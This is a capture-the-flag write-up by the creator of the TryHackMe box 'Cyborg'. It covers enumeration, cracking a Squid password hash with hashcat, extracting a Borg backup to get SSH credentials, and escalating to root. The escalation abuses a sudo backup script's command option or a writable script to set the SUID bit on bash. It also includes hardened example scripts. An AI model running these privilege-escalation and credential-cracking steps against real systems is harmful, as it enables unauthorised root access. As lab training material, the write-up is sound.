Cyborg Writeup(My box!)

Cyborg is a box I made for TryHackMe. It involves cracking a hash found on the web server, then using those credentials to extract a Borg archive, which in turn reveals credentials for SSH. Running sudo -l shows a backup script that also runs from a crontab. We can run that script ourselves, and source analysis shows a custom parameter option that executes whatever command we specify as root. There was also an unintended route: I forgot to make the file owned by root, so people could change its permissions and append their own code, e.g. /bin/bash, and then simply run the file (oopsie!). Either way I think both methods teach something. I might write another blog post going into detail on how I made the machine, but I will come to that in the future.

Summary

  • Nmapping the box to find a website
  • A toggled download bar gives us a tar file
  • Extracting the tar file, we find that it is a Borg archive
  • Finding the /etc directory by reading the comments in the admin section about the proxy
  • Cracking the password hash
  • Extracting the Borg archive using the cracked password
  • SSH access
  • Listing sudo rules
  • Exploiting the backup script by passing a custom parameter to read root.txt

So let's get straight into it!

User

As always we start off with an nmap scan for enumeration.

Nmap

┌──(kali㉿kali)-[~/tryhackme/cyborg]
└─$ nmap -sC -sV -o nmap 10.10.148.94
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 04:47 EST
Nmap scan report for 10.10.148.94
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds

Port 22 is open running SSH and port 80 is open for HTTP, so let's check them out.

We can see that it is just the default Apache “It works” page. Let's dig deeper and start up gobuster.

Gobuster

┌──(kali㉿kali)-[~/tryhackme/cyborg]
└─$ gobuster dir -u http://10.10.148.94/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dirs.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.148.94/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/26 04:53:23 Starting gobuster
===============================================================
/admin (Status: 301)

We can see that it has revealed /admin, so let's check that out.

/Admin

We see that it is a landing page for a music producer. Looking around, we find a toggled download in the archive section, which lets us download an archive.tar file. We will save this for later.

Going over to the admin's section, we can see there is a shout box where people can message each other. They talk about a music archive, but the most important part is the section on the Squid proxy.

Squid is essentially just an HTTP proxy, but we don't need to look into it too much. They claim there are some config files lying about, so let's get googling and find out where these are located.

We find that they are located in /etc/squid/squid.conf; gobuster picks up the /etc directory as well, so that is an alternate method.

squid.conf

auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

The top line refers to a password file, /etc/squid/passwd, and fetching that gives us:

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

We see this is a hash, so we go ahead and crack it.

Cracking hash

hash-identifier                                       
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Possible Hashs:
[+] MD5(APR)

hash-identifier reveals that it is in the MD5(APR) format, so we head over to hashcat's example hashes page and find the mode for it (1600). Cracking the hash with hashcat:

hashcat --force -m 1600 -a 0 has /home/kali/rockyou.txt 
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 3700U with Radeon Vega Mobile Gfx, 1423/1487 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: /home/kali/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward  
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Fri Jan  1 11:14:54 2021, (4 secs)
Time.Estimated...: Fri Jan  1 11:14:58 2021, (0 secs)
Guess.Base.......: File (/home/kali/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    12312 H/s (8.59ms) @ Accel:128 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39424/14344385 (0.27%)
Rejected.........: 0/39424 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: treetree -> cheery

Started: Fri Jan  1 11:13:59 2021
Stopped: Fri Jan  1 11:14:59 2021

So now we have credentials!

music_archive:squidward

We now head back to the tar file and extract it.

┌──(kali㉿kali)-[~/tryhackme/cyborg]
└─$ tar -xvf archive.tar
home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1

Borg

We see the files:

config  data  hints.5  index.5  integrity.5  nonce  README

README:

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

So we have a borg backup repo!

Borg is a deduplicating backup program with compression. I just happened to stumble across it on GitHub and thought it was cool.

Its docs are at https://borgbackup.readthedocs.io/, so let's check them out!

We read the section on usage.

The Usage section shows that an archive is extracted with the following command: borg extract /path/to/repo::my-files

We can get our path to the repo by running pwd.

As for the my-files part, this is the archive name; it seems to be the music_archive that was mentioned earlier and used as the username for the hash (borg list /path/to/repo would list the archive names in the repository to confirm this).

So we can extract our archive now (note that /path/to/archive will be different for everyone):

borg extract /path/to/archive::music_archive

Use the password squidward that we cracked earlier to do this.

And we get the files extracted!

Heading into home/alex/Documents, we can see a note.txt:

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

So now we have credentials!!!

We can ssh into the box as the user “alex”.

ssh alex@10.10.148.94
The authenticity of host '10.10.148.94 (10.10.148.94)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.94' (ECDSA) to the list of known hosts.
alex@10.10.148.94's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

27 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
alex@ubuntu:~$ cat user.txt
flag{************FLAG**************}

We have done user, hooray!

Root

For root there were two methods, one due to a misconfiguration when I made the box, but I thought it was still a cool method so I'm not patching it.

Intended

Running sudo -l shows that we can run backup.sh with sudo.

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

It also runs as a cron job every minute; if you ran linpeas you would see it being executed every minute.

alex@ubuntu:/etc/mp3backups$ ls
backed_up_files.txt  backup.sh  ubuntu-scheduled.tgz

backup.sh:

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

We can see that it is a backup script that archives the mp3 files in the user's home directory.

However, one part of this file sticks out.

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done

This getopts loop takes a parameter from the command line (-c), and at the end of the script its value is executed:

cmd=$($command)
echo $cmd
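For comparison, here is how that option handling could be hardened: the -c value only selects a named action from a fixed allowlist and is never executed as a command. This is an added example written for this post, not the box's own script; the action names, the -f option and the demo archive are my assumptions.

```shell
#!/bin/sh
# Hardened variant of the backup script's option handling (added example,
# not the box's own script). The value passed with -c is never executed;
# it only selects one of a few fixed actions. The -f option and the action
# names are assumptions made for this demo.

# Allowlist: action name -> fixed command. No caller-supplied text reaches a shell.
run_action() {
    action=$1
    archive=$2    # the .tgz the backup produced
    case "$action" in
        list)   tar -tzf "$archive" ;;                       # show archived files
        verify) gzip -t "$archive" && echo "archive OK" ;;   # integrity check
        *)      echo "unknown action: $action" >&2; return 2 ;;
    esac
}

# Same getopts shape as the original (c:), plus -f for the archive path.
# The original did cmd=$($command); here the value is only ever compared.
parse_and_run() {
    action="" archive=""
    OPTIND=1
    while getopts c:f: flag; do
        case "$flag" in
            c) action=$OPTARG ;;
            f) archive=$OPTARG ;;
            *) return 2 ;;
        esac
    done
    run_action "$action" "$archive"
}

# Constructed demo: build a one-file archive, then try a legitimate action
# and a command-injection-style value.
demo() {
    tmp=$(mktemp -d)
    echo "x" > "$tmp/song1.mp3"
    tar -czf "$tmp/demo.tgz" -C "$tmp" song1.mp3
    parse_and_run -c list -f "$tmp/demo.tgz"          # lists the archive's contents
    if parse_and_run -c "whoami" -f "$tmp/demo.tgz" 2>/dev/null; then
        echo "BUG: arbitrary value was accepted"
    else
        echo "rejected as expected"
    fi
    rm -rf "$tmp"
}

demo
```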

So let's give this a test.

alex@ubuntu:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh -c whoami
-------SNIP----------
Backup finished
root

And we can see it is being run as root! From here we can simply read the root flag if we wanted, but we haven't got a shell on the system yet :( Let's get a shell!

We can do this by giving /bin/bash the SUID bit:

sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"

Then we run bash -p and we get a root shell!!!

alex@ubuntu:/etc/mp3backups$ bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
flag{***************FLAG***************}

Now this was the intended method.

The unintended method is to change the permissions of the file so that it is writeable and then put your own commands in it.

chmod 777 /etc/mp3backups/backup.sh
echo "chmod +s /bin/bash" > /etc/mp3backups/backup.sh
./backup.sh
bash -p

This also gives you a root shell. From there you can simply read the root flag, or even get a reverse shell if you want to. Both work.
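The unintended route exists because the sudo target was owned by alex and so could be made writable. As an added example written for this post (not from the box), this POSIX shell helper checks a sudo rule's target for exactly those two conditions and can be fed the command paths printed by sudo -l; the return-code convention and the demo files are my own.

```shell
#!/bin/sh
# Audit helper for sudo rule targets (added example, not part of the box).
# A NOPASSWD target must be owned by the expected user (normally root) and
# must not be writable by group or others; otherwise the invoking user can
# rewrite it. ls -ld is used so the check works on GNU and BSD userland.

# check_sudo_target PATH [EXPECTED_OWNER]
# return: 0 ok, 1 wrong owner, 2 group/other writable, 3 both, 4 missing
check_sudo_target() {
    target=$1
    expected_owner=${2:-root}
    [ -e "$target" ] || { echo "MISSING  $target"; return 4; }
    perms=$(ls -ld "$target" | awk '{print $1}')   # e.g. -rwxrwxrwx
    owner=$(ls -ld "$target" | awk '{print $3}')
    status=0
    if [ "$owner" != "$expected_owner" ]; then
        echo "BADOWNER $target is owned by $owner, expected $expected_owner"
        status=1
    fi
    # char 6 is the group write bit, char 9 the other write bit
    case "$perms" in
        ?????w*|????????w*)
            echo "WRITABLE $target has mode $perms"
            status=$((status + 2)) ;;
    esac
    [ "$status" -eq 0 ] && echo "OK       $target"
    return "$status"
}

# Pull every absolute path out of `sudo -l` output and check each one.
# Lines of interest look like "(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh".
audit_sudo_rules() {
    sudo -n -l 2>/dev/null \
        | awk '/^[ \t]*\(/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }' \
        | sort -u \
        | while read -r path; do check_sudo_target "$path"; done
}

# Constructed demo: a correctly locked-down file and a world-writable one.
demo() {
    tmp=$(mktemp -d)
    me=$(ls -ld "$tmp" | awk '{print $3}')    # current user, as ls prints it
    : > "$tmp/good.sh"; chmod 755 "$tmp/good.sh"
    : > "$tmp/bad.sh";  chmod 777 "$tmp/bad.sh"
    check_sudo_target "$tmp/good.sh" "$me"     # reports OK
    check_sudo_target "$tmp/bad.sh"  "$me"     # reports WRITABLE, returns 2
    rm -rf "$tmp"
}
demo
```

On the box itself, audit_sudo_rules would flag /etc/mp3backups/backup.sh on ownership alone, before anyone touched its mode.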

Thanks for reading, I hope you enjoyed my writeup. I had so much fun making this machine for the TryHackMe community and I hope you enjoyed playing.

If you would like to support me, you can buymeacoffee at the bottom right of your screen, or drop me a follow on Twitter: https://twitter.com/fieldraccoon.

Thanks again. Fieldraccoon

This post is licensed under CC BY 4.0 by the author.